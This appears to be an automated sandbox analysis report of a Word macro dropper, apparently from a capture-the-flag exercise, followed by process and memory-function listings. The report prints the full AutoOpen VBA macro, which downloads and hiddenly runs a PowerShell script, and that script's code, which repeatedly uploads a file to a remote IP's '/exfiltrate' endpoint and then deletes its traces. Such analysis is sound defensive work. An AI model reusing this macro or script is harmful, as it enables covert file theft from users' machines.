Commandline:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1"
Imagebase:	0x890000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	20:19:29
Start date:	08/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff659320000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	20:19:30
Start date:	08/03/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\upload_script.ps1" "C:\Users\user\AppData\Local\Temp\flag.txt" "http://18.157.68.73:11858/exfiltrate"
Imagebase:	0x890000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	20:19:30
Start date:	08/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62fc20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

VBA Code

Call Graph

Hide Legend

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Executed Functions

Subroutine
AutoOpenAPIs: 21, Strings: 12, Number of lines: 35, Relevance: 108.035

APIs	Meta Information
Environ	Environ("TEMP") -> C:\Users\jones\AppData\Local\Temp
CreateObject	CreateObject("MSXML2.XMLHTTP")
Open	IServerXMLHTTPRequest2.Open("GET","https://free-games-ua.s3.eu-central-1.amazonaws.com/flag-stealer.ps1",False)
Send
MsgBox
Status	IServerXMLHTTPRequest2.Status() -> 200
Status	IServerXMLHTTPRequest2.Status() -> 200
CreateObject	CreateObject("Scripting.FileSystemObject")
CreateTextFile	FileSystemObject.CreateTextFile("C:\Users\jones\AppData\Local\Temp\downloaded_script.ps1",True)
Write	TextStream.Write(" $filePath = "$env:TEMP\flag.txt" $serverUrl = "http://18.157.68.73:11858/exfiltrate" # Define the script logic as a string $scriptContent = @' param($filePath, $serverUrl) function UploadFile { param($path, $url) try { $webClient = New-Object System.Net.WebClient $webClient.Headers.Add("User-Agent", "Mozilla/5.0") $webClient.Headers.Add("Content-Type", "text/plain") if (Test-Path $path) { #Write-Host "[] Uploading file: $path" $webClient.UploadFile($url, "POST", $path) #Write-Host "[+] File uploaded successfully!" Remove-Item -Path $path -Force } else { #Write-Host "[!] No flag file found. Sending empty notification." $webClient.UploadString($url, "POST", "No Flag file") } } catch { #Write-Host "[!] Error: $($_.Exception.Message)" } finally { $webClient.Dispose() } } while ($true) { UploadFile -path $filePath -url $serverUrl Start-Sleep -Seconds 60 } '@ # Save the script content to a temporary file $scriptPath = "$env:TEMP\upload_script.ps1" $scriptContent \| Set-Content -Path $scriptPath # Start a new PowerShell process to run the script in the background $process = Start-Process -FilePath "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -WindowStyle Hidden -File `"$scriptPath`" `"$filePath`" `"$serverUrl`"" -PassThru # Display the new process ID Write-Host "[] Job started with PID: $($process.Id)" # Delete the temporary script file after starting the new process Start-Sleep -Seconds 1 Remove-Item -Path $scriptPath -Force #Write-Host "[*] Temporary script file deleted." ")
responseText	IServerXMLHTTPRequest2.responseText() -> $filePath = "$env:TEMP\flag.txt" $serverUrl = "http://18.157.68.73:11858/exfiltrate" # Define the script logic as a string $scriptContent = @' param($filePath, $serverUrl) function UploadFile { param($path, $url) try { $webClient = New-Object System.Net.WebClient $webClient.Headers.Add("User-Agent", "Mozilla/5.0") $webClient.Headers.Add("Content-Type", "text/plain") if (Test-Path $path) { #Write-Host "[] Uploading file: $path" $webClient.UploadFile($url, "POST", $path) #Write-Host "[+] File uploaded successfully!" Remove-Item -Path $path -Force } else { #Write-Host "[!] No flag file found. Sending empty notification." $webClient.UploadString($url, "POST", "No Flag file") } } catch { #Write-Host "[!] Error: $($_.Exception.Message)" } finally { $webClient.Dispose() } } while ($true) { UploadFile -path $filePath -url $serverUrl Start-Sleep -Seconds 60 } '@ # Save the script content to a temporary file $scriptPath = "$env:TEMP\upload_script.ps1" $scriptContent \| Set-Content -Path $scriptPath # Start a new PowerShell process to run the script in the background $process = Start-Process -FilePath "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -WindowStyle Hidden -File `"$scriptPath`" `"$filePath`" `"$serverUrl`"" -PassThru # Display the new process ID Write-Host "[] Job started with PID: $($process.Id)" # Delete the temporary script file after starting the new process Start-Sleep -Seconds 1 Remove-Item -Path $scriptPath -Force #Write-Host "[*] Temporary script file deleted."
Close
CreateObject	CreateObject("WScript.Shell")
Run	IWshShell3.Run("powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\jones\AppData\Local\Temp\downloaded_script.ps1"",0,False) -> 0
Now
TimeValue
Now
DoEvents
Kill
MsgBox
Status

Strings	Decrypted Strings
"https://free-games-ua.s3.eu-central-1.amazonaws.com/flag-stealer.ps1"
"TEMP"
"MSXML2.XMLHTTP"
"GET"
"Status: "
"Scripting.FileSystemObject"
"WScript.Shell"
"powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File """
"Scripting.FileSystemObject"
"WScript.Shell"
"powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File """
"Download failed. HTTP Status: "

Line	Instruction	Meta Information
9	Sub AutoOpen()
10	Dim strUrl as String	executed
11	Dim strFilePath as String
12	Dim objXMLHttp as Object
13	Dim objStream as Object
14	Dim objShell as Object
15	Dim objFile as Object
18	strUrl = "https://free-games-ua.s3.eu-central-1.amazonaws.com/flag-stealer.ps1"
19	strFilePath = Environ("TEMP") & "\downloaded_script.ps1"	Environ("TEMP") -> C:\Users\jones\AppData\Local\Temp executed
22	Set objXMLHttp = CreateObject("MSXML2.XMLHTTP")	CreateObject("MSXML2.XMLHTTP") executed
23	objXMLHttp.Open "GET", strUrl, False	IServerXMLHTTPRequest2.Open("GET","https://free-games-ua.s3.eu-central-1.amazonaws.com/flag-stealer.ps1",False) executed
24	objXMLHttp.Send	Send
26	MsgBox "Status: " & objXMLHttp.Status	MsgBox IServerXMLHTTPRequest2.Status() -> 200 executed
28	If objXMLHttp.Status = 200 Then	IServerXMLHTTPRequest2.Status() -> 200 executed
30	Set objFileSystem = CreateObject("Scripting.FileSystemObject")	CreateObject("Scripting.FileSystemObject") executed
31	Set objFile = objFileSystem.CreateTextFile(strFilePath, True)	FileSystemObject.CreateTextFile("C:\Users\jones\AppData\Local\Temp\downloaded_script.ps1",True) executed
32	objFile.Write objXMLHttp.responseText	TextStream.Write(" $filePath = "$env:TEMP\flag.txt" $serverUrl = "http://18.157.68.73:11858/exfiltrate" # Define the script logic as a string $scriptContent = @' param($filePath, $serverUrl) function UploadFile { param($path, $url) try { $webClient = New-Object System.Net.WebClient $webClient.Headers.Add("User-Agent", "Mozilla/5.0") $webClient.Headers.Add("Content-Type", "text/plain") if (Test-Path $path) { #Write-Host "[] Uploading file: $path" $webClient.UploadFile($url, "POST", $path) #Write-Host "[+] File uploaded successfully!" Remove-Item -Path $path -Force } else { #Write-Host "[!] No flag file found. Sending empty notification." $webClient.UploadString($url, "POST", "No Flag file") } } catch { #Write-Host "[!] Error: $($_.Exception.Message)" } finally { $webClient.Dispose() } } while ($true) { UploadFile -path $filePath -url $serverUrl Start-Sleep -Seconds 60 } '@ # Save the script content to a temporary file $scriptPath = "$env:TEMP\upload_script.ps1" $scriptContent \| Set-Content -Path $scriptPath # Start a new PowerShell process to run the script in the background $process = Start-Process -FilePath "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -WindowStyle Hidden -File `"$scriptPath`" `"$filePath`" `"$serverUrl`"" -PassThru # Display the new process ID Write-Host "[] Job started with PID: $($process.Id)" # Delete the temporary script file after starting the new process Start-Sleep -Seconds 1 Remove-Item -Path $scriptPath -Force #Write-Host "[] Temporary script file deleted." ") IServerXMLHTTPRequest2.responseText() -> $filePath = "$env:TEMP\flag.txt" $serverUrl = "http://18.157.68.73:11858/exfiltrate" # Define the script logic as a string $scriptContent = @' param($filePath, $serverUrl) function UploadFile { param($path, $url) try { $webClient = New-Object System.Net.WebClient $webClient.Headers.Add("User-Agent", "Mozilla/5.0") $webClient.Headers.Add("Content-Type", "text/plain") if (Test-Path $path) { #Write-Host "[] Uploading file: $path" $webClient.UploadFile($url, "POST", $path) #Write-Host "[+] File uploaded successfully!" Remove-Item -Path $path -Force } else { #Write-Host "[!] No flag file found. Sending empty notification." $webClient.UploadString($url, "POST", "No Flag file") } } catch { #Write-Host "[!] Error: $($_.Exception.Message)" } finally { $webClient.Dispose() } } while ($true) { UploadFile -path $filePath -url $serverUrl Start-Sleep -Seconds 60 } '@ # Save the script content to a temporary file $scriptPath = "$env:TEMP\upload_script.ps1" $scriptContent \| Set-Content -Path $scriptPath # Start a new PowerShell process to run the script in the background $process = Start-Process -FilePath "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -WindowStyle Hidden -File `"$scriptPath`" `"$filePath`" `"$serverUrl`"" -PassThru # Display the new process ID Write-Host "[] Job started with PID: $($process.Id)" # Delete the temporary script file after starting the new process Start-Sleep -Seconds 1 Remove-Item -Path $scriptPath -Force #Write-Host "[] Temporary script file deleted." executed
33	objFile.Close	Close
36	Set objShell = CreateObject("WScript.Shell")	CreateObject("WScript.Shell") executed
37	objShell.Run "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File """ & strFilePath & """", 0, False	IWshShell3.Run("powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\jones\AppData\Local\Temp\downloaded_script.ps1"",0,False) -> 0 executed
40	Dim pauseTime as Date
41	pauseTime = Now + TimeValue("00:00:05")	Now TimeValue
42	Do While Now < pauseTime	Now
43	DoEvents	DoEvents
44	Loop	Now
47	On Error Resume Next
48	Kill strFilePath	Kill
49	On Error Goto 0
50	Else
51	MsgBox "Download failed. HTTP Status: " & objXMLHttp.Status	MsgBox Status
52	Endif
55	Set objXMLHttp = Nothing
56	Set objStream = Nothing
57	Set objShell = Nothing
58	End Sub

Analysis Process: powershell.exePID: 7420, Parent PID: 7564COMMON

Executed Functions

Function 03088580 Relevance: 3.2, Strings: 2, Instructions: 669COMMON

Download Yara Rule

Strings

LRq, xrefs: 0308862D
(Xq, xrefs: 0308870F

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID: (Xq$LRq
API String ID: 0-4183028182
Opcode ID: c1fbdce15f069d546675cee45dd2c3cb7e980a801041b31d9851d74f8d2ce334
Instruction ID: ca4f6237a799ce13ce12308ca9fd5beca012d0aaafe603ecce392b4f1432cb88
Opcode Fuzzy Hash: c1fbdce15f069d546675cee45dd2c3cb7e980a801041b31d9851d74f8d2ce334
Instruction Fuzzy Hash: 13523B34B01328CFDB64EB68C854B6DBBB2BF85300F258099D8459B395DB75AD81CF92

Function 03088570 Relevance: 2.6, Strings: 2, Instructions: 148COMMON

Download Yara Rule

Strings

LRq, xrefs: 0308862D
(Xq, xrefs: 0308870F

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID: (Xq$LRq
API String ID: 0-4183028182
Opcode ID: 6e4257af118d37de145dd71b2dec3d02ef2f06a84205602cb257938d2f73ed6a
Instruction ID: 8ee47d4981f0952e67b7ab711c30e8f9baf7fa808c75af4f3d622c9d14897c17
Opcode Fuzzy Hash: 6e4257af118d37de145dd71b2dec3d02ef2f06a84205602cb257938d2f73ed6a
Instruction Fuzzy Hash: AD512674B003288FDB24DF68D850BADBBB2FF88300F1185AAD545AB391DB71AD41CB91

Function 030872C0 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ddeb649b2ebba5658ffaed01918933285395572374cadb1c392ab16ca2951ef
Instruction ID: 931957d568b8bb302178e5a0aef3dda6398f98b484e5a1719d73169e813da9ef
Opcode Fuzzy Hash: 2ddeb649b2ebba5658ffaed01918933285395572374cadb1c392ab16ca2951ef
Instruction Fuzzy Hash: 91918034A013498FCB15DFA4C944AADBBF2EF85700F288599E4469F369CB74ED89CB40

Function 030829F0 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27791d02086cae7d2d9817a1ad2d5d6a666947c14dd944ddd672f494707c9a4a
Instruction ID: 11e6e5fcea08a7a6d47628be6a009f88b477647365862c254df5eb3a4f210a30
Opcode Fuzzy Hash: 27791d02086cae7d2d9817a1ad2d5d6a666947c14dd944ddd672f494707c9a4a
Instruction Fuzzy Hash: 9291BE74A012098FCB15CF58C494AAEFBF5FF88310B248699D855AB361C736EC51CBA0

Function 03087358 Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 277ff61997ee2c55f0c4c967a463f434f91ac7da3744664e209e5efb0c2c984f
Instruction ID: 645db6a9ff72b6a54857c28a00b119067ae7ff67c37acb6ec5e650cbc8ddd349
Opcode Fuzzy Hash: 277ff61997ee2c55f0c4c967a463f434f91ac7da3744664e209e5efb0c2c984f
Instruction Fuzzy Hash: 24917F34A012498FCB15DFA4C984AADBBF2FF88700F248558E4429F369DB74ED49CB80

Function 0308795E Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18c98aa5119aeed04a8fe4c052ff625cd4c4d4a0711a0410c639ea396d35f133
Instruction ID: 6e5bc58314cd04c52f5728e0aaaaac7161aeb77432d84f9535a223a7929f8e3a
Opcode Fuzzy Hash: 18c98aa5119aeed04a8fe4c052ff625cd4c4d4a0711a0410c639ea396d35f133
Instruction Fuzzy Hash: 8F714F70E01218DFDB14DFA9D884BADBBF2BF88300F248469D442AB394DB75AD46CB50

Function 03087CD8 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8be1d5c66a286fc1cf05003c8b3f4a5ff850b3dcff97cb4e2ee14293303cde01
Instruction ID: 170b71ff043c521ac915170fe9bf2d168e136c68200987ccde97eeba46334bd6
Opcode Fuzzy Hash: 8be1d5c66a286fc1cf05003c8b3f4a5ff850b3dcff97cb4e2ee14293303cde01
Instruction Fuzzy Hash: E5615C30A023148FDB64EF68D8546ADBBF2FF88711F288469E446AB354DF359C41CB91

Function 03089808 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78d6480098ebda61bdf22a884d50d8b0e7aeb1cffeeb175dc637a3d8f5418f6e
Instruction ID: 9c519d3f0382b33ad5d439bf2f5e145cbb10ab89d727e51008fe64033522438d
Opcode Fuzzy Hash: 78d6480098ebda61bdf22a884d50d8b0e7aeb1cffeeb175dc637a3d8f5418f6e
Instruction Fuzzy Hash: CB51E670A02214CFDB55EBB4C854B6D7BF6AF89241F1405AAE40ADB3A1DF319D81CF50

Function 03087368 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43120f55eaf7e472e6ac04d77d27ce449858926fb9f5cb1db1e3674812718371
Instruction ID: e3cb9e6bc9d74a8ba8f41be0500250be11fbf9ce9751a9d28737af4efa82ce6e
Opcode Fuzzy Hash: 43120f55eaf7e472e6ac04d77d27ce449858926fb9f5cb1db1e3674812718371
Instruction Fuzzy Hash: 42614E34E012598FDB15DFA4C584A9DBBF2FF84700F288558E442AF369DB74AD89CB80

Function 030877F0 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c8090fea4092b77566c3dd112f91e010845c849665cb0384a06f18ee1a2b04d
Instruction ID: 897f9103c370bee07bed33717febb193988a8b142233287699bdb3d984a4d086
Opcode Fuzzy Hash: 4c8090fea4092b77566c3dd112f91e010845c849665cb0384a06f18ee1a2b04d
Instruction Fuzzy Hash: 62517E70E013189FDB14DFA9D88469DBBF6FF88310F14846AD445AB354DB71AC02CB90

Function 030877E0 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ea5cbc074884ffd8cee94353ccbbc5f7ff0b4248fc6926deb4c254ba415078a
Instruction ID: 25024964eacd82e7f128e617d1afdd8395119dfc00e566a8d1f53d6f665d9b15
Opcode Fuzzy Hash: 5ea5cbc074884ffd8cee94353ccbbc5f7ff0b4248fc6926deb4c254ba415078a
Instruction Fuzzy Hash: CE416B70E01218DFDB14DFA9D88469DFBF6BF88350F248869D446AB794DB71AC46CB80

Function 03082B00 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfde90f17798f3ffa82fc9ab811523529ff325d8dea47726ad08e6bdceb8b6d5
Instruction ID: 93eaf886b959de71f6c12dfc655376b6abf756bb134e13712c8baed72dadfac3
Opcode Fuzzy Hash: cfde90f17798f3ffa82fc9ab811523529ff325d8dea47726ad08e6bdceb8b6d5
Instruction Fuzzy Hash: B0416A74A016098FCB05CF58C598ABAF7F5FF48310B1586A9C855AB365C736FC91CBA0

Function 030876B8 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4425cb8ca2ec74957a69795ffeb6ed2d3108ef24176eebc69e3ac3403d35281
Instruction ID: abf926fd6819685a18415d580526dbbd3aa9834cacdc5060baa4599b293ff147
Opcode Fuzzy Hash: f4425cb8ca2ec74957a69795ffeb6ed2d3108ef24176eebc69e3ac3403d35281
Instruction Fuzzy Hash: 0C317C35B012049FDB54DB69D858B9EBBF2BF8D711F184068E406EB3A1CB71AC41CBA0

Function 030896F3 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fad3f70fa2f7079e78164a6862f210089b62fe92f06c3e3dab43b6c0d38ffb62
Instruction ID: 8fa22574331ec72bd60438a4b0a34e0e09531d37c0d696327b1f541ef93c7fa5
Opcode Fuzzy Hash: fad3f70fa2f7079e78164a6862f210089b62fe92f06c3e3dab43b6c0d38ffb62
Instruction Fuzzy Hash: 1731EB74A012198FEB65DF69CD90F9DB7B2BF88200F1045E5D508AB391DA34DE86CF90

Function 030882E9 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dc5062f7fdf6383a718b0546dc09d8825f88e14950b6fd0877cc6e60aa071d9
Instruction ID: 92d1226e3e934a40d73cbc56ac84f8218db36bb97adc1a3b1d86fb8bc71a9b46
Opcode Fuzzy Hash: 6dc5062f7fdf6383a718b0546dc09d8825f88e14950b6fd0877cc6e60aa071d9
Instruction Fuzzy Hash: 92118B32D0674ACFDB14EFA5D4802EDFFB1BF85300F588A5AD445AB640DB70A986CB80

Function 02D5D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1331183559.0000000002D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d5d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c658e289d60597f9d04ef64184daba5304833c9a47d6e08b87776adfc21f790b
Instruction ID: 155813603f443e36fd66959b5127fd828e065e5e84076cc71ae06c1d1e48abaa
Opcode Fuzzy Hash: c658e289d60597f9d04ef64184daba5304833c9a47d6e08b87776adfc21f790b
Instruction Fuzzy Hash: 1201A7714083509AEB205A19CDC4767BB98DF41264F28C519ED594F382C7B9DC46CAB1

Function 02D5D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1331183559.0000000002D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d5d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b26c990458214e55e3c868c2c0ad435afa3da51004d1eb2b5cfff594bd9737e
Instruction ID: aa4b89db7029325e75fc99c051f66276f19d6db1002a10be4622fabbbb11b155
Opcode Fuzzy Hash: 5b26c990458214e55e3c868c2c0ad435afa3da51004d1eb2b5cfff594bd9737e
Instruction Fuzzy Hash: F301526140E3D05FD7128B258994752BFB8DF43224F1DC1DBDC888F2A3C2695849CB72

Function 03088271 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4397a0bc9f9093ca62066e9f41dbc8bcc9e4466b734668a783c09c5807eaca8
Instruction ID: f1777a146e452baf7c68f0e9b17f8ee485b3c574627f635f8f47c106d09a0495
Opcode Fuzzy Hash: b4397a0bc9f9093ca62066e9f41dbc8bcc9e4466b734668a783c09c5807eaca8
Instruction Fuzzy Hash: 78F05235705B800FC322C728E8506EA7BA2EFC2310B0840EBD144CFA87CA656806C392

Function 03089020 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79157467e0d1b056770e5802e5e2400baa66f4157026cfdb38f95c5a450ef1c9
Instruction ID: 1c9525dd870bb7d26bb87a546d0ce3b372d34a6bd09010e8882273c3fd178172
Opcode Fuzzy Hash: 79157467e0d1b056770e5802e5e2400baa66f4157026cfdb38f95c5a450ef1c9
Instruction Fuzzy Hash: 0BE0EDB5D0465ADF8F48EFE894422BEBBF0EA08201F11897B8919E7340E6354A018FC5

Function 03087BE0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e074c2ad977fb24c12776cbdb169347a98dd5d0ee8160907c10519f0de752da4
Instruction ID: 1dab8848336189ba4a9c268d1ae9b4d8b095de737e00969169261341a6874a15
Opcode Fuzzy Hash: e074c2ad977fb24c12776cbdb169347a98dd5d0ee8160907c10519f0de752da4
Instruction Fuzzy Hash: 58E0D835145220AFC7069B64F8198E57FA5EF0929130180B6F949C7723CA34AC148BE2

Function 03089030 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96ca2b06a8df26f51b61d6b19905c7b1d736499af4478e4f5512a25833bccc91
Instruction ID: 4f2fde1cacdbd8b61103ae4f74f9d6e72e2bfaeae67640ba3afd12b2f92be528
Opcode Fuzzy Hash: 96ca2b06a8df26f51b61d6b19905c7b1d736499af4478e4f5512a25833bccc91
Instruction Fuzzy Hash: 7CE0B6B4D0420E9F8F48EFB994411BEFBF4AB48200F0089AF9819E3300E63446018FD5

Function 03088FF0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69a8424218f0c6a1f06bfcd1dbdf97a4627e190def35a4e86ac2c425bdf6edef
Instruction ID: 82f4fd10d0b94c2b4c13521ded56f5a13a6dcabd32721ed2726c5944efd6aebf
Opcode Fuzzy Hash: 69a8424218f0c6a1f06bfcd1dbdf97a4627e190def35a4e86ac2c425bdf6edef
Instruction Fuzzy Hash: 29D05E2004E7954FC39763747E192A5BF64FB02211B4A01D3E284C946386440989D7A2

Function 03087BF0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1332008934.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3080000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20c15a59486d648f78ee41bc45b622360a7d98adff4460d803324a70c3b07490
Instruction ID: fe2f1fc1c1a18d7b9347d7d2098adfefb95647b0e4b48608e2b3be9b407a129a
Opcode Fuzzy Hash: 20c15a59486d648f78ee41bc45b622360a7d98adff4460d803324a70c3b07490
